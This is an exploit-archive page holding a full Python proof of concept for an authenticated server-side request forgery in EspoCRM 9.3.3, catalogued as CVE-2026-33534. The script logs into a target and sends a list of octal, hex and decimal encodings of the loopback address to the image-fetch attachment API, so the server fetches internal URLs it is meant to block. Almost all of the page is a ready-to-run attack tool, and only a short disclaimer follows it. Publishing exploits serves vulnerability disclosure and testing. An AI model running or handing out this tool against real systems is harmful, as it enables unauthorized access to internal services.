Skip to main content

EspoCRM 9.3.3 – SSRF

Categories: WebApps

EspoCRM 9.3.3 – SSRF

Proof of Concept (PoC)

poc.py
# Exploit Title: EspoCRM 9.3.3 - Authenticated SSRF via Alternative IPv4 Notation
# Google Dork: N/A
# Date: 2026-05-08
# Exploit Author: Max Gabriel (https://github.com/EntroVyx)
# Vendor Homepage: https://www.espocrm.com/
# Software Link: https://github.com/espocrm/espocrm/releases/tag/9.3.3
# Version: 9.3.3
# Tested on: EspoCRM 9.3.3, Debian/Kali, Apache/PHP
# CVE : CVE-2026-33534
# Advisory: https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
#
# Usage:
#   python3 CVE-2026-33534.py -u http://127.0.0.1:8083 -U admin -P 'Admin12345!' --internal-port 8083 --cleanup
#   python3 CVE-2026-33534.py -u https://target.example -U user -P pass --internal-port 9002 --internal-path /interno.png
#   python3 CVE-2026-33534.py -u https://target.example -U user -P pass --payload 0x7f000001 --payload 2130706433

import argparse
import json
import sys
from pathlib import Path
from urllib.parse import urlparse, urlunparse

import requests


DEFAULT_LOOPBACK_PAYLOADS = [
    ("octal dotted", "0177.0.0.1"),
    ("octal dotted padded", "0177.0000.0000.0001"),
    ("octal compressed", "0177.1"),
    ("hex dotted", "0x7f.0.0.1"),
    ("hex dotted full", "0x7f.0x0.0x0.0x1"),
    ("hex dword", "0x7f000001"),
    ("decimal dword", "2130706433"),
    ("octal dword", "017700000001"),
    ("short IPv4 two-part", "127.1"),
    ("short IPv4 three-part", "127.0.1"),
    ("zero-padded dotted", "127.000.000.001"),
    ("long zero-padded octal", "0000000000000000000000000177.0.0.1"),
]


def normalize_base_url(value):
    value = value.rstrip("/")
    parsed = urlparse(value)

    if not parsed.scheme or not parsed.netloc:
        raise argparse.ArgumentTypeError("target URL must include scheme and host")

    return value


def default_internal_port(base_url):
    parsed = urlparse(base_url)

    if parsed.port:
        return parsed.port

    return 443 if parsed.scheme == "https" else 80


def ensure_path(value):
    if not value:
        return "/"

    return value if value.startswith("/") else f"/{value}"


def make_url(base_url, host, internal_port, internal_path):
    parsed = urlparse(base_url)
    netloc = host

    default_port = 443 if parsed.scheme == "https" else 80

    if internal_port != default_port:
        netloc = f"{host}:{internal_port}"

    return urlunparse((parsed.scheme, netloc, ensure_path(internal_path), "", "", ""))


def make_control_url(base_url, internal_port, internal_path):
    return make_url(base_url, "127.0.0.1", internal_port, internal_path)


def load_payloads(args):
    payloads = list(DEFAULT_LOOPBACK_PAYLOADS)

    if args.no_default_payloads:
        payloads = []

    for item in args.payload or []:
        payloads.append(("custom", item.strip()))

    if args.payload_file:
        for line_number, raw_line in enumerate(Path(args.payload_file).read_text().splitlines(), start=1):
            line = raw_line.strip()

            if not line or line.startswith("#"):
                continue

            if "=" in line:
                label, host = line.split("=", 1)
                payloads.append((label.strip() or f"file:{line_number}", host.strip()))
            else:
                payloads.append((f"file:{line_number}", line))

    seen = set()
    output = []

    for label, host in payloads:
        if not host or host in seen:
            continue

        seen.add(host)
        output.append((label, host))

    return output


def post_from_image_url(session, base_url, image_url, field, parent_type, parent_id, timeout):
    endpoint = f"{base_url}/api/v1/Attachment/fromImageUrl"
    payload = {
        "url": image_url,
        "field": field,
        "parentType": parent_type,
    }

    if parent_id:
        payload["parentId"] = parent_id

    return session.post(endpoint, json=payload, timeout=timeout)


def parse_json(response):
    try:
        return response.json()
    except json.JSONDecodeError:
        return None


def short_body(response):
    body = response.text.replace("r", "\r").replace("n", "\n")

    if len(body) > 420:
        return body[:420] + "..."

    return body


def delete_attachment(session, base_url, attachment_id, timeout):
    response = session.delete(f"{base_url}/api/v1/Attachment/{attachment_id}", timeout=timeout)

    return response.status_code in {200, 204}


def is_successful_bypass(response):
    data = parse_json(response)

    return (
        response.status_code == 200 and
        isinstance(data, dict) and
        bool(data.get("id"))
    ), data


def print_result(label, host, response, data):
    if isinstance(data, dict) and data.get("id"):
        print(
            f"[+] {label:24} {host:38} HTTP {response.status_code} "
            f"id={data.get('id')} type={data.get('type')} size={data.get('size')}"
        )

        return

    reason = response.headers.get("X-Status-Reason") or short_body(response) or "-"
    print(f"[-] {label:24} {host:38} HTTP {response.status_code} {reason}")


def main():
    parser = argparse.ArgumentParser(
        description="Authenticated EspoCRM CVE-2026-33534 SSRF verification exploit with multiple encoded loopback payloads."
    )
    parser.add_argument("-u", "--url", required=True, type=normalize_base_url, help="Base URL, e.g. http://host:8083")
    parser.add_argument("-U", "--username", required=True, help="EspoCRM username")
    parser.add_argument("-P", "--password", required=True, help="EspoCRM password")
    parser.add_argument("--internal-port", type=int, help="Internal loopback port for the self-fetch PoC")
    parser.add_argument("--internal-path", default="/client/img/logo-light.svg", help="Internal path for the self-fetch PoC")
    parser.add_argument("--payload", action="append", help="Additional loopback host notation to test, e.g. 0x7f000001")
    parser.add_argument("--payload-file", help="File with one host payload per line, or label=host")
    parser.add_argument("--no-default-payloads", action="store_true", help="Use only --payload/--payload-file entries")
    parser.add_argument("--field", default="avatar", help="Attachment field used by fromImageUrl")
    parser.add_argument("--parent-type", default="User", help="Parent entity type used by fromImageUrl")
    parser.add_argument("--parent-id", help="Optional parent entity id")
    parser.add_argument("--timeout", type=float, default=15.0, help="HTTP timeout")
    parser.add_argument("--cleanup", action="store_true", help="Attempt to delete attachments created by successful payloads")
    parser.add_argument("--stop-on-first", action="store_true", help="Stop after the first successful payload")
    parser.add_argument("--insecure", action="store_true", help="Disable TLS certificate verification")
    args = parser.parse_args()

    payloads = load_payloads(args)

    if not payloads:
        print("[-] No payloads to test.")
        return 2

    internal_port = args.internal_port or default_internal_port(args.url)
    control_url = make_control_url(args.url, internal_port, args.internal_path)

    session = requests.Session()
    session.auth = (args.username, args.password)
    session.headers.update({"Accept": "application/json"})
    session.verify = not args.insecure

    print(f"[*] Target: {args.url}")
    print(f"[*] Control URL: {control_url}")
    print(f"[*] Payload count: {len(payloads)}")

    control = post_from_image_url(
        session,
        args.url,
        control_url,
        args.field,
        args.parent_type,
        args.parent_id,
        args.timeout,
    )

    print(f"[*] Control response: HTTP {control.status_code} {control.headers.get('X-Status-Reason') or short_body(control) or '-'}")

    if control.status_code != 403:
        print("[!] The direct 127.0.0.1 control was not blocked with HTTP 403. Results may not prove CVE-2026-33534.")

    successes = []

    for label, host in payloads:
        ssrf_url = make_url(args.url, host, internal_port, args.internal_path)
        response = post_from_image_url(
            session,
            args.url,
            ssrf_url,
            args.field,
            args.parent_type,
            args.parent_id,
            args.timeout,
        )
        successful, data = is_successful_bypass(response)
        print_result(label, host, response, data)

        if successful:
            successes.append((label, host, ssrf_url, data))

            if args.cleanup and data.get("id"):
                if delete_attachment(session, args.url, data["id"], args.timeout):
                    print(f"    cleanup: deleted attachment {data['id']}")
                else:
                    print(f"    cleanup: failed to delete attachment {data['id']}")

            if args.stop_on_first:
                break

    if not successes:
        print("[-] No encoded loopback payload produced an attachment.")
        return 2

    print("")
    print("[+] Vulnerable behavior confirmed.")
    print(f"[+] Direct loopback control: HTTP {control.status_code}")
    print(f"[+] Successful payloads: {len(successes)}")

    for label, host, ssrf_url, data in successes:
        print(f"    - {label}: {host} -> {data.get('type')} ({ssrf_url})")

    return 0 if control.status_code == 403 else 1


if __name__ == "__main__":
    try:
        sys.exit(main())
    except requests.RequestException as exc:
        print(f"[-] HTTP error: {exc}")
        sys.exit(1)

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...